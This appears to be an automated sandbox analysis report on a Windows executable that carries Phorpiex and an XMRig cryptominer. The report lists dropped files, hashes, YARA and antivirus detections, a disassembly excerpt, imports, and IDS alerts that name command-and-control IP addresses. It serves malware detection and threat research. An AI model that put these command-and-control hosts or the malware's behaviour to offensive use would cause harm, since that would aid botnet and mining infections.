                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                            Process:C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe
                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):5536256
                                                                                                                                                                                            Entropy (8bit):6.689058470432344
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:98304:VJuCqT8q5Jt3eM2UIDLeIY3I7LMHrPZF6OhgIDxDjP5ysRAwRCVYFufw6:zulp5JtBF6Oh3DxxysRFkRw6
                                                                                                                                                                                            MD5:8FA2F1BA9B9A7EA2B3C4DD627C627CEC
                                                                                                                                                                                            SHA1:358E3800286E5D4C5662366AD7311BC5A51BA497
                                                                                                                                                                                            SHA-256:78A452A6E1A3951DC367F57ACE90711202C824B68835C5DB86814F5B41486947
                                                                                                                                                                                            SHA-512:74EDD438B806E086A3FACBE8FB98E235068C0D3F8572C6A3A937649CA0E9A6BCB9F0B42E5562E1CBE3576B011AB83730FC622B1496CC448DD3C296284671E775
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, Author: Joe Security
                                                                                                                                                                                            • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, Author: unknown
                                                                                                                                                                                            • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, Author: Florian Roth
                                                                                                                                                                                            • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, Author: ditekSHen
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                                                                                            Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$................................................................i..............C..Q....i.....i.....i........}....i.....Rich...........PE..d.....(d..........".......9...D.......6........@..............................~...........`.................................................|.P......P~.......{..............`~......AM......................BM.(... AM.8.............9..............................text...^.9.......9................. ..`.rdata........9.......9.............@..@.data.....+...P.......P.............@....pdata........{.......Q.............@..@_RANDOMXV.....}.......S.............@..`_TEXT_CN.&....}..(....S.............@..`_TEXT_CN..... ~.......S.............@..`_RDATA.......@~.......S.............@..@.rsrc........P~.......S.............@..@.reloc.......`~.......S.............@..B........................................
                                                                                                                                                                                            Process:C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe
                                                                                                                                                                                            File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):14544
                                                                                                                                                                                            Entropy (8bit):6.2660301556221185
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                                                                                                            MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                                                                                                            SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                                                                                                            SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                                                                                                            SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1239611256.exe
                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):5827584
                                                                                                                                                                                            Entropy (8bit):7.718261688436852
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:98304:ZMknXV8IFUX81qQ6lLYhJ/N0TB4HBDxWcLKamiwPZhsSZLZ1wpxGN:ZBnXV86UiqrlLY/8AW6YZPZf6HGN
                                                                                                                                                                                            MD5:13B26B2C7048A92D6A843C1302618FAD
                                                                                                                                                                                            SHA1:89C2DFC01AC12EF2704C7669844EC69F1700C1CA
                                                                                                                                                                                            SHA-256:1753AD35ECE25AB9A19048C70062E9170F495E313D7355EBBBA59C38F5D90256
                                                                                                                                                                                            SHA-512:D6AFF89B61C9945002A6798617AD304612460A607EF1CFBDCB32F8932CA648BCEE1D5F2E0321BB4C58C1F4642B1E0ECECC1EB82450FDEC7DFF69B5389F195455
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............&......X................@.............................pY.......Y...`... .............................................. Y.4....PY.......X.X............`Y.0.............................X.(...................."Y.P............................text...P...........................`..`.data.....V.......V.................@....rdata...9....X..:...xX.............@..@.pdata..X.....X.......X.............@..@.xdata........X.......X.............@..@.bss..........Y..........................idata..4.... Y.......X.............@....CRT....`....0Y.......X.............@....tls.........@Y.......X.............@....rsrc........PY.......X.............@....reloc..0....`Y.......X.............@..B........................................................................................................................................................................
                                                                                                                                                                                            Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                            File Type:OpenPGP Public Key
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4080
                                                                                                                                                                                            Entropy (8bit):4.729847075237712
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:2ognIbioHgWZbe7N8vNhsC2NQ7u+UJs20v7yngHR6/Twg:2oDbiKLZbe7NkNhsD+UlGkC6/Td
                                                                                                                                                                                            MD5:9984C582D3B8AEE760E19D9E4E52762D
                                                                                                                                                                                            SHA1:2A779A6EA094F578E7CA8B35E4CD81E89ABB4F64
                                                                                                                                                                                            SHA-256:18758A8DB2B76124F6BCBBB28CCBB070B9A9902E063DAEA756149301B9CDB296
                                                                                                                                                                                            SHA-512:1963E5C4AE01692927A9A11BDEE99BE7ABDDA4BA1CB3C1D62C61104FEB04595B505835FF44521FE039F1E2DCD2536D4433C33F3B17EA3675D807D37D513D4F1F
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.G.(......[o...._:.....N.G.....Z......%.}B.......o....M_./.....................c.g............U.s.....mJE+....^.D....._8L....._;.f...................[.>..................M.........-X.............E.....Z..............%.............Z...............W..V.....K!*....m.o...._9......Q_._......'(......Pi....V>.........R....^.........l\......0.....%..V....].V......?.......................C.....Z.......Z..B....)e.a.....R.......c......N'.y............Z..7......4.....u.....^..K....U.m.......%......2.......m.....^..........<..................].S.....\.V......x.u....Z..>....\...............................M%....%.q.....%..6......~'.....D.....Z..j....Z..{.....XQ......X......U.h......K_r......<e............#H......]5.......cw....\/.....m.7.....Z..........?....-.|q....[.\.....Z..H..............;.............6........I.............N'.........a.......I....Y.>^....R..K..............~.............X......|m0.......Mz....Z..=.....^LR....;[.z..........._9........-.......G.............
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\21324.scr
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):85504
                                                                                                                                                                                            Entropy (8bit):6.394560338648692
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:27zFjdFmav82WoPRgMRmtMJXlXXwfAbQaQG9MF7vRjoJrl:yRyO+oPKjoBAIcZF7vqrl
                                                                                                                                                                                            MD5:06560B5E92D704395BC6DAE58BC7E794
                                                                                                                                                                                            SHA1:FBD3E4AE28620197D1F02BFC24ADAF4DDACD2372
                                                                                                                                                                                            SHA-256:9EAAADF3857E4A3E83F4F78D96AB185213B6528C8E470807F9D16035DAADF33D
                                                                                                                                                                                            SHA-512:B55B49FC1BD526C47D88FCF8A20FCAED900BFB291F2E3E1186EC196A87127ED24DF71385AE04FEDCC802C362C4EBF38EDFC182013FEBF4496DDEB66CE5195EE3
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                            • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Windows\sysppvrdnvs.exe, Author: Joe Security
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L......g.....................p......@y............@..........................p..............................................|0.......................................................................................................................text............................... ..`.rdata...?.......@..................@..@.data........@.......2..............@...................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Entropy (8bit):5.366159944391676
                                                                                                                                                                                            TrID:
                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                            File name:Us051y7j25.exe
                                                                                                                                                                                            File size:10'240 bytes
                                                                                                                                                                                            MD5:82894caeb7e149bb38d344fbc2a821d9
                                                                                                                                                                                            SHA1:bf86bd33666e58f291bc9135a95f67a7483cde52
                                                                                                                                                                                            SHA256:fdbf0c19ebcafcf5e4295edc9e4a37836ba580b9a4d63b2a9ccdf8418ed5fe84
                                                                                                                                                                                            SHA512:fff4b4e8f5d03f6dea5cffc58e59455362269410cb48ce5a2ced621f8489e01bfddd0f99d32b181186fe63ff64c1aa0172b735c008018dba61119143b5e9ddf3
                                                                                                                                                                                            SSDEEP:192:4luii0852nhe8D9+6X/2X1JxTh3thW8yV:4lTdu2nhpsiuFV32V
                                                                                                                                                                                            TLSH:8F22391EED4640B2F36A0EF057A281DE86BD840313D620EFFFD299648F19351A4DA0AD
                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........fW...9...9...9...B...9.......9...8...9.......9.......9.......9.......9.Rich..9.........................PE..L......g...........
                                                                                                                                                                                            Icon Hash:00928e8e8686b000
                                                                                                                                                                                            Entrypoint:0x4019a7
                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                            Time Stamp:0x671BA78F [Fri Oct 25 14:13:35 2024 UTC]
                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                            OS Version Major:5
                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                            File Version Major:5
                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                            Subsystem Version Major:5
                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                            Import Hash:c8d4c38d956ebc54044d50e191e50d17
                                                                                                                                                                                            Instruction
                                                                                                                                                                                            call 00007F903C811B81h
                                                                                                                                                                                            jmp 00007F903C81153Bh
                                                                                                                                                                                            mov edi, edi
                                                                                                                                                                                            push ebp
                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                            mov eax, dword ptr [ebp+08h]
                                                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                                                            cmp dword ptr [eax], E06D7363h
                                                                                                                                                                                            jne 00007F903C81182Ch
                                                                                                                                                                                            cmp dword ptr [eax+10h], 03h
                                                                                                                                                                                            jne 00007F903C811826h
                                                                                                                                                                                            mov eax, dword ptr [eax+14h]
                                                                                                                                                                                            cmp eax, 19930520h
                                                                                                                                                                                            je 00007F903C811817h
                                                                                                                                                                                            cmp eax, 19930521h
                                                                                                                                                                                            je 00007F903C811810h
                                                                                                                                                                                            cmp eax, 19930522h
                                                                                                                                                                                            je 00007F903C811809h
                                                                                                                                                                                            cmp eax, 01994000h
                                                                                                                                                                                            jne 00007F903C811807h
                                                                                                                                                                                            call 00007F903C811BD6h
                                                                                                                                                                                            xor eax, eax
                                                                                                                                                                                            pop ebp
                                                                                                                                                                                            retn 0004h
                                                                                                                                                                                            push 004019B1h
                                                                                                                                                                                            call dword ptr [0040201Ch]
                                                                                                                                                                                            xor eax, eax
                                                                                                                                                                                            ret
                                                                                                                                                                                            int3
                                                                                                                                                                                            jmp dword ptr [004020B8h]
                                                                                                                                                                                            push 00000014h
                                                                                                                                                                                            push 00402370h
                                                                                                                                                                                            call 00007F903C811A6Dh
                                                                                                                                                                                            push dword ptr [00403384h]
                                                                                                                                                                                            mov esi, dword ptr [00402064h]
                                                                                                                                                                                            call esi
                                                                                                                                                                                            pop ecx
                                                                                                                                                                                            mov dword ptr [ebp-1Ch], eax
                                                                                                                                                                                            cmp eax, FFFFFFFFh
                                                                                                                                                                                            jne 00007F903C81180Eh
                                                                                                                                                                                            push dword ptr [ebp+08h]
                                                                                                                                                                                            call dword ptr [004020C4h]
                                                                                                                                                                                            pop ecx
                                                                                                                                                                                            jmp 00007F903C811869h
                                                                                                                                                                                            push 00000008h
                                                                                                                                                                                            call 00007F903C811B97h
                                                                                                                                                                                            pop ecx
                                                                                                                                                                                            and dword ptr [ebp-04h], 00000000h
                                                                                                                                                                                            push dword ptr [00403384h]
                                                                                                                                                                                            call esi
                                                                                                                                                                                            mov dword ptr [ebp-1Ch], eax
                                                                                                                                                                                            push dword ptr [00403380h]
                                                                                                                                                                                            call esi
                                                                                                                                                                                            pop ecx
                                                                                                                                                                                            pop ecx
                                                                                                                                                                                            mov dword ptr [ebp-20h], eax
                                                                                                                                                                                            lea eax, dword ptr [ebp-20h]
                                                                                                                                                                                            push eax
                                                                                                                                                                                            lea eax, dword ptr [ebp-1Ch]
                                                                                                                                                                                            push eax
                                                                                                                                                                                            push dword ptr [ebp+08h]
                                                                                                                                                                                            mov esi, dword ptr [0040207Ch]
                                                                                                                                                                                            call esi
                                                                                                                                                                                            Programming Language:
                                                                                                                                                                                            • [IMP] VS2005 build 50727
                                                                                                                                                                                            • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                            • [ASM] VS2008 SP1 build 30729
                                                                                                                                                                                            • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                            • [C++] VS2008 SP1 build 30729
                                                                                                                                                                                            • [LNK] VS2008 SP1 build 30729
                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x23ac0x50.rdata
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x2b0.rsrc
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x50000x1cc.reloc
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x22e00x40.rdata
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000xdc.rdata
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                            .text0x10000xf040x10009713fa163b36e99b96230a4c6e2e93b4False0.6005859375data5.980924888539037IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                            .rdata0x20000x8540xa00e314da7b877b5b193cc4a9f999c9406dFalse0.4484375SysEx File - Jellinghaus4.569523349557985IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                            .data0x30000x38c0x200202a0f14ba4a024e6a35d5895669b769False0.060546875data0.35275948821577235IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                            .rsrc0x40000x2b00x400554d0cedd69e96ee00c8324ce4da604cFalse0.3623046875data5.194459669718395IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                            .reloc0x50000x2260x4007951b1b41631be1461ac9dabfa024b34False0.453125data3.7419716739437874IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                            RT_MANIFEST0x40580x256ASCII text, with CRLF line terminatorsEnglishUnited States0.5100334448160535
                                                                                                                                                                                            DLLImport
                                                                                                                                                                                            MSVCR90.dll?terminate@@YAXXZ, _unlock, __dllonexit, _lock, _decode_pointer, _except_handler4_common, _invoke_watson, _controlfp_s, _crt_debugger_hook, __set_app_type, _encode_pointer, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _configthreadlocale, _initterm_e, _initterm, _acmdln, exit, _ismbblead, _XcptFilter, _exit, _cexit, __getmainargs, _amsg_exit, srand, mbstowcs, _onexit, rand
                                                                                                                                                                                            KERNEL32.dllUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, QueryPerformanceCounter, SetUnhandledExceptionFilter, GetStartupInfoA, InterlockedCompareExchange, InterlockedExchange, Sleep, DeleteFileW, CopyFileW, MoveFileW, LoadLibraryA, GetProcAddress, GetTickCount, FreeLibrary, IsDebuggerPresent
                                                                                                                                                                                            USER32.dllFindWindowA, wsprintfW
                                                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                            EnglishUnited States
                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                            2024-10-26T07:26:13.686782+02002837677ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature)1185.215.113.6680192.168.2.649814TCP
                                                                                                                                                                                            2024-10-26T07:26:13.686782+02002837677ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature)1185.215.113.6680192.168.2.650018TCP
                                                                                                                                                                                            2024-10-26T07:26:13.686782+02002826930ETPRO COINMINER XMR CoinMiner Usage2192.168.2.650008185.215.113.665152TCP
                                                                                                                                                                                            2024-10-26T07:26:13.686782+02002837677ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature)1185.215.113.6680192.168.2.650000TCP
                                                                                                                                                                                            2024-10-26T07:26:26.831139+02002022050ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M11185.215.113.6680192.168.2.649763TCP
                                                                                                                                                                                            2024-10-26T07:26:27.136621+02002022051ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M21185.215.113.6680192.168.2.649763TCP
                                                                                                                                                                                            2024-10-26T07:26:36.856045+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649814185.215.113.6680TCP
                                                                                                                                                                                            2024-10-26T07:26:36.856045+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.649814185.215.113.6680TCP
                                                                                                                                                                                            2024-10-26T07:26:38.418676+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.65841585.173.115.18040500UDP
                                                                                                                                                                                            2024-10-26T07:26:38.805924+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649826185.215.113.6680TCP
                                                                                                                                                                                            2024-10-26T07:26:38.805924+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.649826185.215.113.6680TCP
                                                                                                                                                                                            2024-10-26T07:26:39.130562+02002837677ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature)1185.215.113.6680192.168.2.649826TCP
                                                                                                                                                                                            2024-10-26T07:26:43.408274+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.65841590.156.163.12140500UDP
                                                                                                                                                                                            2024-10-26T07:26:44.437846+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649856185.215.113.6680TCP
                                                                                                                                                                                            2024-10-26T07:26:44.437846+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.649856185.215.113.6680TCP
